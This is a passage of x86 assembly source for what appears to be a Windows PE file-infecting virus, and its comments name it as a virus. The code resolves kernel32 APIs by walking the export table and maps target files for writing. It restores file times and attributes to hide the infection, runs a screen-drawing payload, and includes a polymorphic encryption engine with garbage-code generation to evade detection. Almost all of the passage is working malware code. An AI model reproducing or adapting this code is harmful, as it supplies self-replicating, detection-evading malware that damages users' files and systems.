;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Get entry point for GetProcAddress
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
my_GetProcAddr: ;
|
||
;Entry:
|
||
;
|
||
;a_Kernel32 - Base address for kernel32
|
||
;
|
||
;Exit:
|
||
;
|
||
;eax - Entry point for GetProcAddress
|
||
; or NULL if error
|
||
;
|
||
|
||
push ebx
|
||
|
||
;Check for MZ signature at base address
|
||
|
||
cld
|
||
mov ebx,dword ptr [ebp+a_Kernel32]
|
||
cmp word ptr [ebx],IMAGE_DOS_SIGNATURE
|
||
jne e_GetProcAddr
|
||
|
||
;Now go to the pe header and check for the PE signature
|
||
|
||
mov esi,dword ptr [ebx+IMAGE_DOS_HEADER.DH_lfanew]
|
||
add esi,ebx
|
||
lodsd
|
||
cmp eax,IMAGE_NT_SIGNATURE
|
||
jne e_GetProcAddr
|
||
|
||
;Get pointer to Image Export Directory and save it
|
||
|
||
add esi,NT_OptionalHeader. \
|
||
OH_DirectoryEntries. \
|
||
DE_Export. \
|
||
DD_VirtualAddress-0004h
|
||
lodsd
|
||
add eax,ebx
|
||
push eax
|
||
|
||
;Get pointer to exported function names
|
||
;Also follow the AddressOfNameOrdinals array
|
||
|
||
mov ecx,dword ptr [eax+ED_NumberOfNames]
|
||
mov edx,dword ptr [eax+ED_AddressOfNameOrdinals]
|
||
add edx,ebx
|
||
lea esi,dword ptr [eax+ED_AddressOfNames]
|
||
lodsd
|
||
add eax,ebx
|
||
|
||
next_name: ;Search for GetProcAddress in exported function names
|
||
|
||
push ecx
|
||
lea esi,dword ptr [ebp+szGetProcAddr]
|
||
mov edi,dword ptr [eax]
|
||
or edi,edi
|
||
jz try_next
|
||
|
||
got_name_rva: ;Get absolute address
|
||
|
||
add edi,ebx
|
||
|
||
;Compare names
|
||
|
||
mov ecx,0000000Eh
|
||
repe cmpsb
|
||
je found_name
|
||
|
||
try_next: ;Go to next name
|
||
|
||
add eax,00000004h
|
||
add edx,00000002h
|
||
pop ecx
|
||
loop next_name
|
||
|
||
;Name not found, exit with error
|
||
|
||
pop eax
|
||
jmp short e_GetProcAddr
|
||
|
||
found_name: ;Ok, now edx is the index of the function, so
|
||
;lets look at AddressOfNameOrdinals using that index
|
||
|
||
pop ecx
|
||
pop edi
|
||
|
||
;Get ordinal for function
|
||
|
||
movzx eax,word ptr [edx]
|
||
|
||
;Check if ordinal out of range
|
||
|
||
cmp eax,[edi+ED_NumberOfFunctions]
|
||
jae short e_GetProcAddr
|
||
|
||
;This is the starting export ordinal number
|
||
|
||
sub eax,dword ptr [edi+ED_BaseOrdinal]
|
||
inc eax
|
||
shl eax,02h
|
||
|
||
;Get address of function
|
||
|
||
mov esi,dword ptr [edi+ED_AddressOfFunctions]
|
||
add esi,eax
|
||
add esi,ebx
|
||
lodsd
|
||
add eax,ebx
|
||
pop ebx
|
||
ret
|
||
|
||
e_GetProcAddr: ;GetProcAddress not found, exit with error
|
||
|
||
xor eax,eax
|
||
pop ebx
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Get KERNEL32 module handle if we cant get it using GetModuleHandle
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
my_getkernel: ;Get KERNEL32 base address using the ID_ForwarderChain
|
||
;
|
||
;Entry:
|
||
;
|
||
;ebx - Base address of host in memory
|
||
;
|
||
;Exit:
|
||
;
|
||
;eax - Kernel32 base address or NULL if error
|
||
;
|
||
|
||
;Generate a mov esi,xxxx instruction
|
||
|
||
db 0BEh
|
||
|
||
;This is just a rva that points to ID_ForwarderChain
|
||
;field inside Kernel32 import module descriptor
|
||
|
||
rva_kernel32 dd 00000000h
|
||
|
||
;Get Kernel32 entry point from ID_ForwarderChain
|
||
|
||
add esi,ebx
|
||
lodsd
|
||
|
||
;Check for the MZ signature
|
||
|
||
cmp word ptr [eax],IMAGE_DOS_SIGNATURE
|
||
jne err_getkernel
|
||
|
||
;Now go to the pe header and check for the PE signature
|
||
|
||
mov esi,dword ptr [eax+DH_lfanew]
|
||
cmp dword ptr [esi+eax],IMAGE_NT_SIGNATURE
|
||
jne err_getkernel
|
||
|
||
ret
|
||
|
||
err_getkernel: ;Could not find KERNEL32 base addres :(
|
||
|
||
xor eax,eax
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Get APIs entry point
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
get_functions: ;Get the entry point for all KERNEL32 API functions
|
||
;used by the virus
|
||
;
|
||
;Entry:
|
||
;
|
||
;None
|
||
;
|
||
;Exit:
|
||
;
|
||
;ecx - NULL if error
|
||
;
|
||
|
||
;Dont fuck our host base address
|
||
|
||
push ebx
|
||
|
||
;Get pointer to viral function names
|
||
|
||
lea esi,dword ptr [ebp+viral_functions]
|
||
lea edi,dword ptr [ebp+viral_addresses]
|
||
|
||
;Get number of functions
|
||
|
||
mov ecx,(offset viral_tbl_end-offset viral_functions)/04h
|
||
|
||
get_each_ep: ;Get pointer to function name
|
||
|
||
cld
|
||
lodsd
|
||
add eax,ebp
|
||
|
||
;Save counter and pointers
|
||
|
||
push ecx
|
||
push esi
|
||
push edi
|
||
|
||
;Get entry point using GetProcAddress
|
||
|
||
push eax
|
||
push dword ptr [ebp+a_Kernel32]
|
||
call dword ptr [ebp+a_GetProcAddr]
|
||
|
||
;Restore counter and pointers
|
||
|
||
pop edi
|
||
pop esi
|
||
pop ecx
|
||
|
||
;Check if entry point is valid
|
||
|
||
or eax,eax
|
||
jz exit_get_func
|
||
|
||
;Save function entry point
|
||
|
||
cld
|
||
stosd
|
||
|
||
;Next function
|
||
|
||
loop get_each_ep
|
||
|
||
exit_get_func: ;Return, eax contains last function entry point or NULL
|
||
;if error
|
||
|
||
mov ecx,eax
|
||
pop ebx
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Open file and create it memory mapped image
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
open_map_file: ;
|
||
;Entry:
|
||
;
|
||
;my_FindData - FindData about file
|
||
;szWorkDir - Buffer for path + name of file to infect
|
||
;
|
||
;Exit:
|
||
;
|
||
;eax - Base address of memory map for file
|
||
; 00000000h if error
|
||
;
|
||
|
||
;Reset attributes so we can get read/write access
|
||
;to target file
|
||
|
||
push FILE_ATTRIBUTE_NORMAL
|
||
lea eax,dword ptr [ebp+szWorkDir]
|
||
push eax
|
||
call dword ptr [ebp+a_SetFileAttr]
|
||
or eax,eax
|
||
jz exit_open_map
|
||
|
||
;Open existing file
|
||
|
||
xor eax,eax
|
||
push eax
|
||
push FILE_ATTRIBUTE_NORMAL
|
||
push OPEN_EXISTING
|
||
push eax
|
||
push eax
|
||
push GENERIC_READ or GENERIC_WRITE
|
||
lea eax,dword ptr [ebp+szWorkDir]
|
||
push eax
|
||
lea eax,dword ptr [ebp+a_CreateFile]
|
||
call dword ptr [ebp+a_CreateFile]
|
||
cmp eax,INVALID_HANDLE_VALUE
|
||
je exit_open_map
|
||
|
||
;Create filemapping over file
|
||
|
||
mov dword ptr [ebp+CreateFile_h],eax
|
||
xor eax,eax
|
||
push eax
|
||
push dword ptr [ebp+my_FindData.WFD_nFileSizeLow]
|
||
push eax
|
||
push PAGE_READWRITE
|
||
push eax
|
||
push [ebp+CreateFile_h]
|
||
call dword ptr [ebp+a_CreateFileMap]
|
||
or eax,eax
|
||
jz Close_Create
|
||
|
||
;Map file in memory, get base address
|
||
|
||
mov dword ptr [ebp+Mapping_h],eax
|
||
xor eax,eax
|
||
push dword ptr [ebp+my_FindData.WFD_nFileSizeLow]
|
||
push eax
|
||
push eax
|
||
push FILE_MAP_WRITE
|
||
push [ebp+Mapping_h]
|
||
call dword ptr [ebp+a_MapViewOfFile]
|
||
or eax,eax
|
||
jz Close_Mapping
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Unmap memory mapped its associated file and close file handle
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
unmap_close: ;
|
||
;Entry:
|
||
;
|
||
;eax - File base address in memory
|
||
;
|
||
;Exit:
|
||
;
|
||
;None
|
||
;
|
||
|
||
push eax
|
||
call dword ptr [ebp+a_UnmapView]
|
||
|
||
Close_Mapping: ;Close handle created by CreateFileMappingA
|
||
|
||
push dword ptr [ebp+Mapping_h]
|
||
call dword ptr [ebp+a_CloseHandle]
|
||
|
||
Close_Create: ;Restore file time
|
||
|
||
lea eax,dword ptr [ebp+my_FindData.WFD_ftLastWriteTime]
|
||
mov edx,00000008h
|
||
push eax
|
||
sub eax,edx
|
||
push eax
|
||
sub eax,edx
|
||
push eax
|
||
push dword ptr [ebp+CreateFile_h]
|
||
call dword ptr [ebp+a_SetFileTime]
|
||
|
||
;Close handle created by CreateFileA
|
||
|
||
push dword ptr [ebp+CreateFile_h]
|
||
call dword ptr [ebp+a_CloseHandle]
|
||
|
||
;Restore file attributes
|
||
|
||
push dword ptr [ebp+my_FindData.WFD_dwFileAttributes]
|
||
lea eax,dword ptr [ebp+szWorkDir]
|
||
push eax
|
||
call dword ptr [ebp+a_SetFileAttr]
|
||
|
||
exit_open_map: xor eax,eax
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Activation routine
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
payload: ;Use LoadLibrary to get a valid handle over USER32.dll
|
||
|
||
lea eax,dword ptr [ebp+szUSER32]
|
||
push eax
|
||
call dword ptr [ebp+a_LoadLibrary]
|
||
or eax,eax
|
||
jz exit_payload
|
||
mov dword ptr [ebp+a_User32],eax
|
||
|
||
;Get entry-point for LoadIcon
|
||
|
||
lea edx,dword ptr [ebp+szLoadIcon]
|
||
push edx
|
||
push eax
|
||
call dword ptr [ebp+a_GetProcAddr]
|
||
or eax,eax
|
||
jz exit_payload
|
||
|
||
;Load custom icon
|
||
|
||
push 32513
|
||
xor edx,edx
|
||
push edx
|
||
call eax
|
||
or eax,eax
|
||
jz exit_payload
|
||
mov dword ptr [ebp+h_icon],eax
|
||
|
||
;Get entry-point for GetDC
|
||
|
||
lea edx,dword ptr [ebp+szGetDC]
|
||
push edx
|
||
push dword ptr [ebp+a_User32]
|
||
call dword ptr [ebp+a_GetProcAddr]
|
||
or eax,eax
|
||
jz exit_payload
|
||
|
||
;Get device context for the screen
|
||
|
||
xor edx,edx
|
||
push edx
|
||
call eax
|
||
or eax,eax
|
||
jz exit_payload
|
||
mov dword ptr [ebp+dc_screen],eax
|
||
|
||
;Get entry-point for DrawIcon
|
||
|
||
lea edx,dword ptr [ebp+szDrawIcon]
|
||
push edx
|
||
push dword ptr [ebp+a_User32]
|
||
call dword ptr [ebp+a_GetProcAddr]
|
||
or eax,eax
|
||
jz exit_payload
|
||
|
||
mov ecx,00000100h
|
||
|
||
loop_payload: ;Draw some icons in random coordinates
|
||
|
||
push eax
|
||
push ecx
|
||
mov edx,eax
|
||
push dword ptr [ebp+h_icon]
|
||
mov eax,00000800h
|
||
call get_rnd_range
|
||
push eax
|
||
mov eax,00000400h
|
||
call get_rnd_range
|
||
push eax
|
||
push dword ptr [ebp+dc_screen]
|
||
call edx
|
||
pop ecx
|
||
pop eax
|
||
loop loop_payload
|
||
|
||
;Print
|
||
|
||
exit_payload: ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate polymorphic encryption
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
mutate: ;Initialize reg flags and random number generator
|
||
|
||
call init_poly
|
||
|
||
;Select index reg
|
||
|
||
call get_valid_reg
|
||
mov al,byte ptr [ebx+REG_MASK]
|
||
mov byte ptr [ebp+index_mask],al
|
||
or byte ptr [ebx+REG_FLAGS],REG_IS_INDEX
|
||
|
||
;Select counter reg
|
||
|
||
call get_valid_reg
|
||
mov al,byte ptr [ebx+REG_MASK]
|
||
mov byte ptr [ebp+counter_mask],al
|
||
or byte ptr [ebx+REG_FLAGS],REG_IS_COUNTER
|
||
|
||
;Get and save random displacement
|
||
;Do not use any displacement if this field value is null
|
||
|
||
call get_rnd32
|
||
and eax,00000001h
|
||
jz ok_disp
|
||
call get_rnd32
|
||
ok_disp: mov dword ptr [ebp+ptr_disp],eax
|
||
|
||
;Now get a random key
|
||
|
||
call get_rnd32
|
||
mov dword ptr [ebp+crypt_key],eax
|
||
|
||
;Now get some flags
|
||
|
||
call get_rnd32
|
||
mov byte ptr [ebp+build_flags],al
|
||
|
||
;Get size for INC/DEC procedures
|
||
|
||
call get_rnd32
|
||
and al,03h
|
||
cmp al,01h
|
||
je get_size_ok
|
||
cmp al,02h
|
||
je get_size_ok
|
||
inc al
|
||
get_size_ok: mov byte ptr [ebp+oper_size],al
|
||
|
||
;Where to put decryptor code
|
||
|
||
lea edi,dword ptr [ebp+poly_decryptor+mem_size]
|
||
|
||
;Lets begin inserting some shit
|
||
|
||
call gen_garbage
|
||
|
||
;Choose a random decryptor style
|
||
;Each style uses the same build procedures, but
|
||
;in diferent order
|
||
|
||
mov eax,(end_styles-tbl_styles)/04h
|
||
call get_rnd_range
|
||
lea esi,dword ptr [ebp+tbl_styles+eax*04h]
|
||
lodsd
|
||
add eax,ebp
|
||
mov esi,eax
|
||
|
||
;Generator for decryptor styles
|
||
|
||
;Build initialization code
|
||
|
||
mov ecx,00000003h
|
||
call gen_style_code
|
||
|
||
;Set the loop point in the middle of nowhere
|
||
|
||
push esi
|
||
call gen_garbage
|
||
mov dword ptr [ebp+loop_point],edi
|
||
call gen_garbage
|
||
pop esi
|
||
|
||
;Build loop code
|
||
|
||
mov ecx,00000004
|
||
call gen_style_code
|
||
|
||
;Insert a jump to virus code
|
||
|
||
mov al,0E9h
|
||
stosb
|
||
lea eax,dword ptr [ebp+Mem_Base+mem_size]
|
||
sub eax,edi
|
||
sub eax,00000004h
|
||
stosd
|
||
|
||
;Some garbage
|
||
|
||
call gen_rnd_block
|
||
|
||
;Now do encryption
|
||
|
||
lea edi,dword ptr [ebp+Mem_Base+mem_size]
|
||
call fixed_size2ecx
|
||
loop_hide_code: push ecx
|
||
mov eax,dword ptr [edi]
|
||
call perform_crypt
|
||
xor ecx,ecx
|
||
mov cl,byte ptr [ebp+oper_size]
|
||
loop_copy_res: stosb
|
||
shr eax,08h
|
||
loop loop_copy_res
|
||
pop ecx
|
||
loop loop_hide_code
|
||
|
||
;Exit polymorphic engine
|
||
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generator for decryptor styles
|
||
